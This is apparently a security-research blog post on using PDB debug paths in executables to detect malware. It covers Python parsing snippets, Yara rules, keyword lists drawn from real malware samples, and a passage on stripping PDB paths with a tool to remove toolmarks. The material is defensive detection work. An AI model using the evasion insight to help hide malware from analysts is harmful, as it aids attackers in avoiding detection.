We find that malware developers give descriptive names to their folders and code projects, often describing the capabilities of the malware in development. These descriptive names thus show up in a PDB path when a malware project is compiled with symbol debugging information. Everyone loves an origin story, and debugging information gives us insight into the malware development environment, a small, but important keyhole into where and how a piece of malware was born. We can use our newfound insight to detect malicious activity based in part on PDB paths and other debug details.

Welcome to part one of a multi-part, tweet-inspired series about PDB paths, their relation to malware, and how they may be useful in both defensive and offensive operations.

Human-Computer Conventions

Digital storage systems have revolutionized our world but in order to make use of our stored data and retrieve it in an efficient manner, we must organize it sensibly. Users structure directories carefully and give files and folders unique and descriptive names. Often users name folders and files based on their content. Computers force users to label and annotate their data based on the data type, role, and purpose. This human-computer convention means that most digital content has some descriptive surface area, or descriptive “features” that are present in many files, including malware files.

FireEye approaches detection and hunting from many angles, but on FireEye’s Advanced Practices team, we often like to flex on “weak signals.” We like to search for features of malware that are not evil in isolation but uncommon or unique enough to be useful. We create conditional rules that when met are “weak signals” telling us that a subset of data, such as a file object or a process, has some odd or novel features. These features are often incidental outcomes of adversary methods, or modus operandi, that each represent deliberate choices made by malware developers or intrusion operators. Not all these features were meant to be in there, and they were certainly not intended for defenders to notice. This is especially true for PDB paths, which can be described as an outcome of the compilation process, a toolmark left in malware that describes the development environment.

PDBs

A program database (PDB) file, often referred to as a “symbol file,” is generated upon compilation to store debugging information about an individual build of a program. A PDB may store symbols, addresses, names of functions and resources and other information that may assist with debugging the program to find the exact source of an exception or error.

Malware is software, and malware developers are software developers. Like any software developers, malware authors often have to debug their code and sometimes end up creating PDBs as part of their development process. If they do not spend time debugging their malware, they risk their malware not functioning correctly on victim hosts, or not being able to successfully communicate with their malware remotely.

How PDB Paths are Made (the birds and the PDBs?)

But how are PDBs created and connected to programs? Let’s examine the formation of one PDB path through the eyes of a malware developer and blogger, the soon-to-be-infamous “smiller.”

Smiller has a lot of programming projects and organizes them in an aptly labeled folder structure on his computer. This project is for a shellcode loader embedded in an HTML Application (HTA) file, and the developer stores it quite logically in the folder:

D:\smiller\projects\super_evil_stuff\shellcode\


Figure 1: The simple “Test” project code file “Program.cs” which embeds a piece of shellcode and a launcher executable within an HTML Application (HTA) file


Figure 2: The malicious Visual Studio solution HtaDotnet and corresponding “Test” project folder as seen through Windows Explorer. The names of the folders and files are suggestive of their functionalities

The malware author then compiles their “Test” project in Visual Studio using the default “Debug” configuration (Figure 3) and writes out Test.exe and Test.pdb to a subfolder (Figure 4).


Figure 3: The Visual Studio output of a default compiling configuration


Figure 4: Test.exe and Test.pdb are written to a default subfolder of the code project folder

In the Test.pdb file (Figure 5) there are references to the original path for the source code files along with other binary information for use in debugging.


Figure 5: Test.pdb contains binary debug information and references to the original source code files for use in debugging

During compilation, the linker associates the PDB file with the built executable by adding an entry to the IMAGE_DEBUG_DIRECTORY specifying the type of the debug information. In this case, the debug type is CodeView, so the PDB path is embedded in the IMAGE_DEBUG_TYPE_CODEVIEW portion of the file. This enables a debugger to locate the correct PDB file, Test.pdb, while debugging Test.exe.


Figure 6: Test.exe as shown in the PEview utility, which easily parses out the PDB path from the IMAGE_DEBUG_TYPE_CODEVIEW section of the executable file
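
The same path can be pulled out programmatically rather than with a GUI viewer. The sketch below uses the third-party pefile library; the DIRECTORY_ENTRY_DEBUG and PdbFileName attribute names reflect our understanding of that library and may need adjusting for your version.

import pefile  # third-party library assumed

pe = pefile.PE("Test.exe")
for debug_entry in getattr(pe, "DIRECTORY_ENTRY_DEBUG", []):
    # 2 == IMAGE_DEBUG_TYPE_CODEVIEW
    if debug_entry.struct.Type == 2 and hasattr(debug_entry.entry, "PdbFileName"):
        pdb_path = debug_entry.entry.PdbFileName.rstrip(b"\x00")
        print(pdb_path.decode("latin-1", "replace"))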

PDB Path in CodeView Debug Information

CodeView Structure

The exact format of the debug information may vary depending on compiler and linker and the modernity of one’s software development tools. CodeView debug information is stored under IMAGE_DEBUG_TYPE_CODEVIEW in the following structure:

Type | Description
DWORD | "RSDS" header
GUID | 16-byte Globally Unique Identifier
DWORD | "age" (incrementing # of revisions)
BYTE | PDB path, null terminated

Figure 7: Structure of CodeView debug directory information
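
For reference, a minimal Python sketch that decodes a raw CV_INFO_PDB70 blob laid out as in Figure 7 (starting at the "RSDS" signature) might look like this:

import struct
import uuid

def parse_codeview(blob: bytes):
    # Layout per Figure 7: "RSDS" header, 16-byte GUID, 4-byte age, null-terminated PDB path.
    if blob[:4] != b"RSDS":
        raise ValueError("not an RSDS (PDB 7.0) CodeView record")
    guid = uuid.UUID(bytes_le=blob[4:20])
    (age,) = struct.unpack_from("<I", blob, 20)
    path_end = blob.index(b"\x00", 24)  # assumes the null terminator is present
    pdb_path = blob[24:path_end].decode("latin-1", "replace")
    return guid, age, pdb_path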

Full Versus Partial PDB Path

There are generally two buckets of CodeView PDB paths: those that are fully qualified directory paths and those that are partially qualified, specifying only the name of the PDB file. In both cases, the name of the PDB file with the .pdb extension is included to ensure the debugger locates the correct PDB for the program.

A partially qualified PDB path would list only the PDB file name, such as:

Test.pdb

A fully qualified PDB path usually begins with a volume drive letter and a directory path to the PDB file name such as:

D:\smiller\projects\super_evil_stuff\shellcode\Test\obj\Debug\Test.pdb

Typically, native Windows executables use a partially qualified PDB path because many of the corresponding PDB files are publicly available on the Microsoft public symbol server, so a fully qualified path is unnecessary in the embedded symbol path. For the purposes of this research, we will mostly be looking at fully qualified PDB paths.

Surveying PDB Paths in Malware

In Operation Shadowhammer, which has a myriad of connections to APT41, one sample had a simple, yet descriptive PDB path: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb”

The naming makes perfect sense. The malware was intended to masquerade as Asus Corporation software, and the role of the malware was shellcode. The malware developer named the project after the function and role of the malware itself.

If we accept that the nature of digital data forces developers into these naming conventions, we figured that these conventions would hold true across other threat actors, malware families, and intrusion operations. FireEye’s Advanced Practices team loves to take seemingly innocuous features of an intrusion set and determine what about these things is good, bad and ugly. What is normal, and what is abnormal? What is globally prevalent and what is rare? What are malware authors doing that is different from what non-malware developers are doing? What assumptions can we make and measure?

Letting our curiosity take the wheel, we adapted the CodeView debug information structure into a regular expression (Figure 8) and developed Yara rules (Figure 9) to survey our data sets. This helped us identify commonalities and enabled us to see which threat actors and malware families may be “detectable” based only on features within PDB path strings.


Figure 8: A Perl-compatible regular expression (PCRE) adaptation of the PDB7 debug information in an executable to include a specific keyword


Figure 9: Template Yara rule to search for executables with PDB files matching a keyword
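
For analysts without a Yara deployment handy, the same survey can be approximated in Python. The sketch below mirrors the CodeView pattern used in the ConventionEngine rules later in this post and flags any sample whose embedded PDB path contains a keyword of interest; the "shellcode" keyword and the directory argument are illustrative choices, not part of the original rules.

import re
import sys
from pathlib import Path

# Mirrors the ConventionEngine pattern: "RSDS" + 20 bytes (GUID + age) + drive path + ".pdb\0".
PDB_PATH = re.compile(rb"RSDS.{20}([a-zA-Z]:\\.{0,200}?\.pdb)\x00", re.DOTALL)
KEYWORD = b"shellcode"  # illustrative keyword

for sample in Path(sys.argv[1]).rglob("*"):
    if not sample.is_file():
        continue
    data = sample.read_bytes()
    for match in PDB_PATH.finditer(data):
        path = match.group(1)
        if KEYWORD in path.lower():
            print(f"{sample}: {path.decode('latin-1', 'replace')}")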

PDB Path Showcase: Malware Naming Conventions

We surveyed 10+ million samples in our incident response and malware corpus, and we found plenty of common PDB path keywords that seemed to transcend different sources, victims, affected regions, impacted industries, and actor motivations. To help articulate the broad reach of malware developer commonalities, we detail a handful of the stronger keywords along with example PDB paths, with represented malware families and threat groups where at least one sample has the applicable keyword.

Please note that the example paths and represented malware families and groups are a selection from the total data set, and not necessarily correlated, clustered or otherwise related to each other. This is intended to illustrate the wide presence of PDB paths with keywords and how malware developers, irrespective of origin, targets and motivations often end up using some of the same words in their naming. We believe that this commonality increases the surface area of malware and introduces new opportunities for detection and hunting.

PDB Path Keyword Prevalence

Keyword: anti
Families: RUNBACK, HANDSTAMP, LOKIBOT, NETWIRE, DARKMOON, PHOTO, RAWHIDE, DUCKFAT, HIGHNOON, DEEPOCEAN, SOGU, CANNONFODDER
Groups: APT10, APT24, APT41, UNC589, UNC824, UNC969, UNC765
Example: H:\RbDoor\Anti_winmm\AppInit\AppInit\Release\AppInit.pdb

Keyword: attack
Families: MINIASP, SANNY, DIRTCHEAP, ORCUSRAT
Groups: APT1, UNC776, UNC251, UNC1131
Example: E:\C\Attack\mini_asp-0615\attack\MiniAsp3\Release\MiniAsp.pdb

Keyword: backdoor
Families: PACMAN, SOUNDWAVE, PHOTO, WINERACK, DUALGUN
Groups: APT41, APT34, APT37, UNC52, UNC1131, APT40
Example: Y:\Hack\backdoor\3-exe-attack\temp\UAC_Elevated\win32\UAC_Elevated.pdb

Keyword: bind
Families: SCREENBIND, SEEGAP, CABLECAR, UPDATESEE, SEEDOOR, TURNEDUP, CABROCK, YABROD, FOXHOLE
Groups: UNC373, UNC510, UNC875, APT36, APT33, APT5, UNC822
Example: C:\Documents and Settings\ss\桌面\tls\scr\bind\bind\Release\bind.pdb

Keyword: bypass
Families: POSHC2, FIRESHADOW, FLOWERPOT, RYUK, HAYMAKER, UPCONTROL, PHOTO, BEACON, SOGU
Groups: APT10, APT34, APT21, UNC1289, UNC1450
Example: C:\Documents and Settings\Administrator\桌面\BypassUAC.VS2010\Release\Go.pdb

Keyword: downloader
Families: SPICYBEAN, GOOSEDOWN, ANTFARM, BUGJUICE, ENFAL, SOURFACE, KASPER, ELMER, TWOBALL, KIBBLEBITS
Groups: APT28, UNC1354, UNC1077, UNC27, UNC653, UNC1180, UNC1031
Example: Z:\projects\vs 2012\Inst DWN and DWN XP\downloader_dll_http_mtfs\Release\downloader_dll_http_mtfs.pdb

Keyword: dropper
Families: CITADEL, FIDDLELOG, SWIFTKICK, KAYSLICE, FORMBOOK, EMOTET, SANNY, FIDDLEWOOD, DARKNEURON, URSNIF, RUNOFF
Groups: UNC776, UNC1095, APT29, APT36, UNC964, UNC1437, UNC849
Example: D:\Task\DDE Attack\Dropper_Original\Release\Dropper.pdb

Keyword: exploit
Families: TRICKBOT, RUNBACK, PUNCHOUT, QANAT, OZONERAT
Groups: UNC1030, APT39, APT34, FIN6
Example: w:\modules\exploits\littletools\agent_wrapper\release\12345678901234567890123456789012345678\wrapper3.pdb

Keyword: fake
Families: FIRESHADOW
Groups: UNC1172, APT39, UNC822
Example: D:\Work\Project\VS\house\Apple\Apple_20180115\Release\FakeRun.pdb

Keyword: fuck
Families: TRICKBOT, CEREAL, KRYPTONITE, SUPERMAN
Groups: APT17, UNC208, UNC276
Example: E:\CODE\工程文件\20110505_LEVNOhard\CODE\AnyRat\FuckAll'sUI\bin\FuckAll.pdb

Keyword: hack
Families: PHOTO, KILLDEVIL, NETWIRE, PACMAN, BADSIGN, TRESOCHO, BADGUEST, GH0ST, VIPSHELL
Groups: UNC1152, APT40, UNC78, UNC874, UNC52, UNC502, APT33, APT8
Example: C:\Users\Alienware.DESKTOP-MKL3QDN\Documents\Hacker\memorygrabber - ID\memorygrabber\obj\x86\Debug\vshost.pdb

Keyword: hide
Families: FRESHAIR, DIRTYWORD, GH0ST, DARKMOON, FIELDGOAL, RAWHIDE, DLLDOOR, TRICKBOT, 008S, JAMBOX, SOGU, CANDYSHELL
Groups: APT26, APT40, UNC213, APT26, UNC44, UNC53, UNC282
Example: c:\winddk\6001.18002\work\hideport\i386\HidePort.pdb

Keyword: hook
Families: GEARSHIFT, METASTAGE, FASTPOS, HANDSTAMP, FON, CLASSFON, WATERFAIRY, RATVERMIN
Groups: UNC842, UNC1197, UNC1040, UNC969
Example: D:\รายงาน\C++ & D3D & Hook & VB.NET & PROJECT\Visual Studio 2010\CodeMaster OnlyTh\Inject_Win32_2\Inject Win32\Inject Win32\Release\OLT_PBFREE.pdb

Keyword: inject
Families: SKNET, KOADIC, ISMAGENT, FULLTRUNK, ZZINJECT, ENFAL, RANSACK, GEARSHIFT, LOCKLOAD, WHIPSNAP, BEACON, CABROCK, HIGHNOON, DETECT, THREESNEAK, FOXHOLE
Groups: UNC606, APT10, APT34, APT41, UNC373, APT31, APT34, APT19, APT1, UNC82, UNC1168, UNC1149, UNC575
Example: E:\0xFFDebug\My Source\HashDump\Release\injectLsa.pdb

Keyword: install
Families: FIRESHADOW, SCRAPMINT, BRIGHTCOMB, WINERACK, SLUDGENUDGE, ANCHOR, EXCHAIN, KIBBLEBITS, ENFAL, DANCEPARTY, SLIMEGRIME, DRABCUBE, EXCHAIN, DIMWIT, THREESNEAK, GOOGONE, STEW, LOWLIGHT, QUASIFOUR, CANNONFODDER, EASYCHAIR, ONETOFOUR, DEEPOCEAN, BRIGHTCREST, LUMBERJACK, EVILTOSS, BRIGHTCYAN, PEKINGDUCK, SIDEVIEW, BOSSNAIL
Groups: UNC869, UNC385, UNC228, APT5, UNC229, APT26, APT37, UNC432, APT18, UNC27, APT6, UNC1172, UNC593, UNC451, UNC875, UNC53
Example: i:\LIE_SHOU\URL_CURUN-A\installer\Release\jet.pdb

Keyword: keylog
Families: LIMITLESS, ZZDROP, WAVEKEY, FIDDLEKEYS, SKIDHOOK, HAWKEYE, BEACON, DIZZYLOG, SOUNDWAVE
Groups: APT37, UNC82, UNC1095, APT1, APT40
Example: D:\TASK\ProgamsByMe(2015.1~)\MyWork\Relative Backdoor\KeyLogger_ScreenCap_Manager\Release\SoundRec.pdb

Keyword: payload
Families: POSHC2, SHAKTI, LIMITLESS, RANSACK, CATRUNNER, BREAKDANCE, DARKMOON, METERPRETER, DHARMA, GAMEFISH, RAWHIDE, LIGHTPOKE
Groups: UNC915, UNC632, UNC1149, APT28, UNC878
Example: C:\Users\WIN-2-ViHKwdGJ574H\Desktop\NSA\Payloads\windows service cpp\Release\CppWindowsService.pdb

Keyword: shell
Families: SOGU, RANSACK, CARBANAK, BLACKCOFFEE, SIDEWINDER, PHOTO, SHIMSHINE, PILLOWMINT, POSHC2, PI, METASTAGE, GH0ST, VIPSHELL, GAUSS, DRABCUBE, FINDLOCK, NEDDYSHELL, MONOPOD, FIREPIPE, URSNIF, KAYSLICE, DEEPOCEAN, EIGHTONE, DAYJOB, EXCALIBUR, NICECATCH
Groups: UNC48, UNC1225, APT17, UNC1149, APT35, UNC251, UNC521, UNC8, UNC849, UNC1428, UNC1374, UNC53, UNC1215, UNC964, UNC1217, APT3, UNC671, UNC757, UNC753, APT10, APT34, UNC229, APT18, APT9, UNC124, UNC1559
Example: E:\windows\dropperNew\Debug\testShellcode.pdb

Keyword: sleep
Families: URSNIF, CARBANAK, PILLOWMINT, SHIMSHINE, ICEDID
Groups: FIN7
Example: O:\misc_src\release_priv_aut_v2.2_sleep_DATE\my\src\sdb_test_dll\x64\Release\sdb_test.pdb

Keyword: spy
Families: DUSTYSKY, OFFTRACK, SCRAPMINT, FINSPY, LOCKLOAD, WINDOLLAR
Groups: FIN7, UNC583, UNC822, UNC1120
Example: G:\development\Winspy\ntsvc32-93-01-05\x64\Release\ntsvcst32.pdb

Keyword: trojan
Families: ENFAL, IMMINENTMONITOR, MSRIP, GH0ST, LITRECOLA, DIMWIT
Groups: UNC1373, UNC366, APT19, UNC1352, UNC27, APT1, UNC981, UNC581, UNC1559
Example: e:\work\projects\trojan\client\dll\i386\Client.pdb

Figure 10: A selection of common keywords in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Suspicious Developer Environment Terms

The keywords that are typically used to describe malware are strong enough to raise red flags, but there are other common terms or features in PDB paths that may signal that an executable was compiled in a non-enterprise setting. For example, any PDB path containing a “Users” directory tells you that the executable was likely compiled on Windows Vista/7/10 and likely does not represent an “official” or “commercial” development environment. The term “Users” is much weaker, or lower in fidelity, than “shellcode”, but as we demonstrate below, these terms are indeed present in lots of malware and can be used as weak detection signals.

PDB Path Term Prevalence

Term: Users
Families: ABBEYROAD, AGENTTESLA, ANTFARM, AURORA, BEACON, BLACKDOG, BLACKREMOTE, BLACKSHADESRAT, BREAKDANCE, BROKEYOLK, BUSYFIB, CAMUBOT, CARDCAM, CATNAP, CHILDSPLAY, CITADEL, CROSSWALK, CURVEBALL, DARKCOMET, DARKMOON, DESERTFALCON, DESERTKATZ, DISPKILL, DIZZYLOG, EMOTET, FIDDLEWOOD, FIVERINGS, FLATTOP, FLUXXY, FOOTMOUSE, FORMBOOK, GOLDENCAT, GROK, GZIPDE, HAWKEYE, HIDDENTEAR, HIGHNOTE, HKDOOR, ICEDID, ICEFOG, ISMAGENT, KASPER, KOADIC, LUKEWARM, LUXNET, MOONRAT, NANOCORE, NETGRAIL, NJRAT, NUTSHELL, ONETOFOUR, ORCUSRAT, POISONIVY, POSHC2, QUASARRAT, QUICKHOARD, RADMIN, RANSACK, RAWHIDE, REMCOS, REVENGERAT, RYUK, SANDPIPE, SANDTRAP, SCREENTIME, SEEDOOR, SHADOWTECH, SILENTBYTES, SKIDHOOK, SLIMCAT, SLOWROLL, SOGU, SOREGUT, SOURCANDLE, TREASUREHUNT, TRENDCLOUD, TRESOCHO, TRICKBOT, TRIK, TROCHILUS, TURNEDUP, TWINSERVE, UPCONTROL, UPDATESEE, URSNIF, WATERFAIRY, XHUNTER, XRAT, ZEUS
Groups: APT5, APT10, APT17, APT33, APT34, APT35, APT36, APT37, APT39, APT40, APT41, FIN6, UNC284, UNC347, UNC373, UNC432, UNC632, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1065, UNC1124, UNC1149, UNC1152, UNC1197, UNC1289, UNC1295, UNC1340, UNC1352, UNC1354, UNC1374, UNC1406, UNC1450, UNC1486, UNC1507, UNC1516, UNC1534, UNC1545, UNC1562
Example: C:\Users\Yousef\Desktop\MergeFiles\Loader v0\Loader\obj\Release\Loader.pdb

Term: ConsoleApplication, WindowsApplication, WindowsFormsApplication (Visual Studio default project names)
Families: CROSSWALK, DESERTKATZ, DIZZYLOG, FIREPIPE, HIGHPRIEST, HOUDINI, HTRAN, KICKBACK, LUKEWARM, MOONRAT, NIGHTOWL, NJRAT, ORCUSRAT, REDZONE, REVENGERAT, RYUK, SEEDOOR, SLOAD, SOGU, TRICKBOT, TRICKSHOW
Groups: APT1, APT34, APT36, FIN6, UNC251, UNC729, UNC1078, UNC1147, UNC1172, UNC1267, UNC1277, UNC1289, UNC1295, UNC1340, UNC1470, UNC1507
Example: D:\Projects\ByPassAV\ConsoleApplication1\Release\ConsoleApplication1.pdb

Term: New Folder
Families: HOMEUNIX, KASPER, MOONRAT, NANOCORE, NETWIRE, OZONERAT, POISONIVY, REMCOS, SKIDHOOK, TRICKBOT, TURNEDUP, URLZONE
Groups: APT18, APT33, APT36, UNC53, UNC74, UNC672, UNC718, UNC1030, UNC1289, UNC1340, UNC1559
Example: c:\Users\USA\Documents\Visual Studio 2008\Projects\New folder (2)\kasper\Release\kasper.pdb

Term: Copy
Families: DESERTFALCON, KASPER, NJRAT, RYUK, SOGU
Groups: UNC124, UNC718, UNC757, UNC1065, UNC1215, UNC1225, UNC1289
Example: D:\dll_Mc2.1mc\2.4\2.4.2 xor\zhu\dll_Mc - Copy\Release\shellcode.pdb

Term: Desktop
Families: AGENTTESLA, AVEO, BEACON, BUSYFIB, CHILDSPLAY, COATHOOK, DESERTKATZ, FIVERINGS, FLATTOP, FORMBOOK, GH0ST, GOLDENCAT, HIGHNOTE, HTRAN, IMMINENTMONITOR, KASPER, KOADIC, LUXNET, MOONRAT, NANOCORE, NETWIRE, NUTSHELL, ORCUSRAT, RANSACK, RUNBACK, SEEDOOR, SKIDHOOK, SLIMCAT, SLOWROLL, SOGU, TIERNULL, TINYNUKE, TRICKBOT, TRIK, TROCHILUS, TURNEDUP, UPDATESEE, WASHBOARD, WATERFAIRY, XRAT
Groups: APT5, APT17, APT26, APT33, APT34, APT35, APT36, APT41, UNC53, UNC276, UNC308, UNC373, UNC534, UNC551, UNC572, UNC672, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1124, UNC1149, UNC1197, UNC1352
Example: C:\Users\Develop_MM\Desktop\sc_loader\Release\sc_loader.pdb

Figure 11: A selection of common terms in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Exploring Anomalies

Outside of keywords and terms, we discovered a few uncommon (to us) features that may be interesting for future research and detection opportunities.

Non-ASCII Characters

PDB paths with any non-ASCII characters have a high ratio of malware to non-malware in our datasets. The strength of this signal is only because of a data bias in our malware corpus and in our client base. However, if this data bias is consistent, we can use the presence of non-ASCII characters in a PDB path as a signal that an executable merits further scrutiny. In organizations that operate primarily in the world of ASCII, we imagine this will be a strong signal. Below we express logic for this technique in Yara:

rule ConventionEngine_Anomaly_NonAscii
{
    meta:
        author = "@stvemillertime"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,500}[^\x00-\x7F]{1,}[\x00-\xFF]{0,500}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre
}

Multiple Paths in a Single File

Each compiled program should only have one PDB path. The presence of multiple PDB paths in a single object indicates that the object has subfile executables, from which you may infer that the parent object has the capability to “drop” or “install” other files. While being a dropper or installer is not malicious on its own, having an alternative method of applying those classifications to file objects may be of assistance in surfacing malicious activity. In this example, we can also search for this capability using Yara:

rule ConventionEngine_Anomaly_MultiPDB_Triple
{
    meta:
        author = "@stvemillertime"
    strings:
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #anchor == 3 and #pcre == 3
}

Outside of a Debug Section

When a file is compiled, the entry for the debug information is in the IMAGE_DEBUG_DIRECTORY. Similar to seeing multiple PDB paths in a single file, when we see debug information inside an executable that does not have a debug directory, we can infer that the file has subfile executables and likely has dropper or installer functionality. In this rule, we use Yara’s convenient PE module to check the relative virtual address (RVA) of the IMAGE_DIRECTORY_ENTRY_DEBUG entry; if it is zero, we can presume that there is no debug entry and thus the presence of a CodeView PDB path indicates that there is a subfile.

import "pe"

rule ConventionEngine_Anomaly_OutsideOfDebug
{
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
    strings:
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $anchor and $pcre and pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_DEBUG].virtual_address == 0
}

Nulled Out PDB Paths

In the typical CodeView section, we would see the “RSDS” header, the 16-byte GUID, a 4-byte “age” and then a PDB path string. However, we’ve identified a significant number of malware samples where the embedded PDB path area is nulled out. In this example, we can easily see the CodeView debug structure, complete with header, GUID and age, followed by nulls to the end of the segment.

00147880: 52 53 44 53 18 c8 03 4e 8c 0c 4f 46 be b2 ed 9e : RSDS...N..OF....
00147890: c1 9f a3 f4 01 00 00 00 00 00 00 00 00 00 00 00 : ................
001478a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
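
A quick way to flag this anomaly in a corpus, sketched below, is to look for CodeView records whose path field begins with a null byte immediately after the 20 bytes of GUID and age:

import re

# "RSDS" + 20 bytes (GUID + age) followed immediately by a null byte,
# i.e. the PDB path field has been zeroed out as in the hex dump above.
NULLED_CODEVIEW = re.compile(rb"RSDS.{20}\x00", re.DOTALL)

def has_nulled_pdb_path(data: bytes) -> bool:
    return bool(NULLED_CODEVIEW.search(data))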

There are a few possibilities of how and why a CodeView PDB path may be nulled out, but in the case of intentional tampering, for the purposes of removing toolmarks, the easiest way would be to manually overwrite the PDB path with \x00s. The risk of manual editing and overwriting via hex editor is that doing so is laborious and may introduce other static anomalies such as checksum errors.

The next easiest way is to use a utility designed to wipe debug artifacts from executables. One stellar example of this is “peupdate,” which is designed not only to strip or fabricate the PDB path information, but also to recalculate the checksum and eliminate Rich headers. Below we demonstrate the use of peupdate to clear the PDB path.


Figure 12: Using peupdate to clear the PDB path information from a sample of malware


Figure 13: The peupdate tampered malware as shown in the PEview utility. We see the CodeView section is still present but the PDB path value has been cleared out

PDB Path Anomaly Prevalence

Anomaly: Non-Ascii Characters
Families: 008S, AGENTTESLA, BADSIGN, BAGELBYTE, BIRDSEED, BLACKCOFFEE, CANNONFODDER, CARDDROP, CEREAL, CHILDSPLAY, COATHOOK, CURVEBALL, DANCEPARTY, DIMWIT, DIZZYLOG, EARTHWORM, EIGHTONE, ELISE, ELKNOT, ENFAL, EXCHAIN, FANNYPACK, FLOWERPOT, FREELOAD, GH0ST, GINGERYUM, GLASSFLAW, GLOOXMAIL, GOLDENCAT, GOOGHARD, GOOGONE, HANDSTAMP, HELLWOOD, HIGHNOON, ICEFOG, ISHELLYAHOO, JAMBOX, JIMA, KRYPTONITE, LIGHTSERVER, LOCKLOAD, LOKIBOT, LOWLIGHT, METASTAGE, NETWIRE, PACMAN, PARITE, POISONIVY, PIEDPIPER, PINKTRIP, PLAYNICE, QUASARRAT, REDZONE, SCREENBIND, SHADOWMASK, SHORTLEASH, SIDEWINDER, SLIMEGRIME, SOGU, SUPERMAN, SWEETBASIL, TEMPFUN, TRAVELNET, TROCHILUS, URSNIF, VIPER, VIPSHELL
Groups: APT1, APT2, APT3, APT5, APT6, APT9, APT10, APT14, APT17, APT18, APT20, APT21, APT23, APT24, APT24, APT24, APT26, APT31, APT33, APT41, UNC20, UNC27, UNC39, UNC53, UNC74, UNC78, UNC1040, UNC1078, UNC1172, UNC1486, UNC156, UNC208, UNC229, UNC237, UNC276, UNC293, UNC366, UNC373, UNC451, UNC454, UNC521, UNC542, UNC551, UNC556, UNC565, UNC584, UNC629, UNC753, UNC794, UNC798, UNC969
Example: I:\RControl\小工具\123\判断加载着\Release\判断加载着.pdb

Anomaly: Multi Path in Single File
Families: AGENTTESLA, BANKSHOT, BEACON, BIRDSEED, BLACKBELT, BRIGHTCOMB, BUGJUICE, CAMUBOT, CARDDROP, CETTRA, CHIPSHOT, COOKIECLOG, CURVEBALL, DARKMOON, DESERTFALCON, DIMWIT, ELISE, EXTRAMAYO, FIDDLELOG, FIDDLEWOOD, FLUXXY, FON, GEARSHIFT, GH0ST, HANDSTAMP, HAWKEYE, HIGHNOON, HIKIT, ICEFOG, IMMINENTMONITOR, ISMAGENT, KASPER, KAZYBOT, LIMITLESS, LOKIBOT, LUMBERJACK, MOONRAT, ORCUSRAT, PLANEDOWN, PLANEPATCH, POSEIDON, POSHC2, PUBNUBRAT, PUPYRAT, QUASARRAT, RABBITHOLE, RATVERMIN, RAWHIDE, REDTAPE, RYUK, SAKABOTA, SAMAS, SAMAS, SEEGAP, SEEKEYS, SKIDHOOK, SOGU, SWEETCANDLE, SWEETTEA, TRAVELNET, TRICKBOT, TROCHILUS, UPCONTROL, UPDATESEE, UROBUROS, WASHBOARD, WHITEWALK, WINERACK, XTREMERAT, ZXSHELL
Groups: APT1, APT2, APT17, APT5, APT20, APT21, APT26, APT34, APT36, APT37, APT40, APT41, UNC27, UNC53, UNC218, UNC251, UNC432, UNC521, UNC718, UNC776, UNC875, UNC878, UNC969, UNC1031, UNC1040, UNC1065, UNC1092, UNC1095, UNC1166, UNC1183, UNC1289, UNC1374, UNC1443, UNC1450, UNC1495
Example (a single sample of TRICKBOT):
D:\MyProjects\spreader\Release\spreader_x86.pdb
D:\MyProjects\spreader\Release\ssExecutor_x86.pdb
D:\MyProjects\spreader\Release\screenLocker_x86.pdb

Anomaly: Outside of Debug Section
Families: ABBEYROAD, AGENTTESLA, BEACON, BLACKSHADESRAT, CHIMNEYDIP, CITADEL, COOKIECLOG, COREBOT, CRACKSHOT, DAYJOB, DIRTCHEAP, DIZZYLOG, DUSTYSKY, EARTHWORM, EIGHTONE, ELISE, EXTRAMAYO, FRONTWHEEL, GELCAPSULE, GH0ST, HAWKEYE, HIGHNOON, KAYSLICE, LEADPENCIL, LOKIBOT, METASTAGE, METERPRETER, MURKYTOP, NUTSHELL, ORCUSRAT, OUTLOOKDUMP, PACMAN, POISONIVY, PLANEPATCH, PONY, PUPYRAT, RATVERMIN, SAKABOTA, SANDTRAP, SEADADDY, SEEDOOR, SHORTLEASH, SOGU, SOULBOT, TERA, TIXKEYS, UPCONTROL, WHIPSNAP, WHITEWALK, XDOOR, XTUNNEL
Groups: APT5, APT6, APT9, APT10, APT17, APT22, APT24, APT26, APT27, APT29, APT30, APT34, APT35, APT36, APT37, APT40, APT41, UNC20, UNC27, UNC39, UNC53, UNC69, UNC74, UNC105, UNC124, UNC125, UNC147, UNC213, UNC215, UNC218, UNC227, UNC251, UNC276, UNC282, UNC307, UNC308, UNC347, UNC407, UNC565, UNC583, UNC587, UNC589, UNC631, UNC707, UNC718, UNC775, UNC776, UNC779, UNC842, UNC869, UNC875, UNC875, UNC924, UNC1040, UNC1080, UNC1148, UNC1152, UNC1225, UNC1251, UNC1428, UNC1450, UNC1486, UNC1575

Anomaly: Nulled Out PDB Paths
Families: HIGHNOON, SANNY, PHOTO, TERA, SOYSAUCE, VIPER, FIDDLEWOOD, BLACKDOG, FLUSHSHOW, NJRAT, LONGCUT
Groups: APT41, UNC776, UNC229, UNC177, UNC1267, UNC878, UNC1511

Figure 14: A selection of anomalies in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Outliers, Oddities, Exceptions and Other Shenanigans

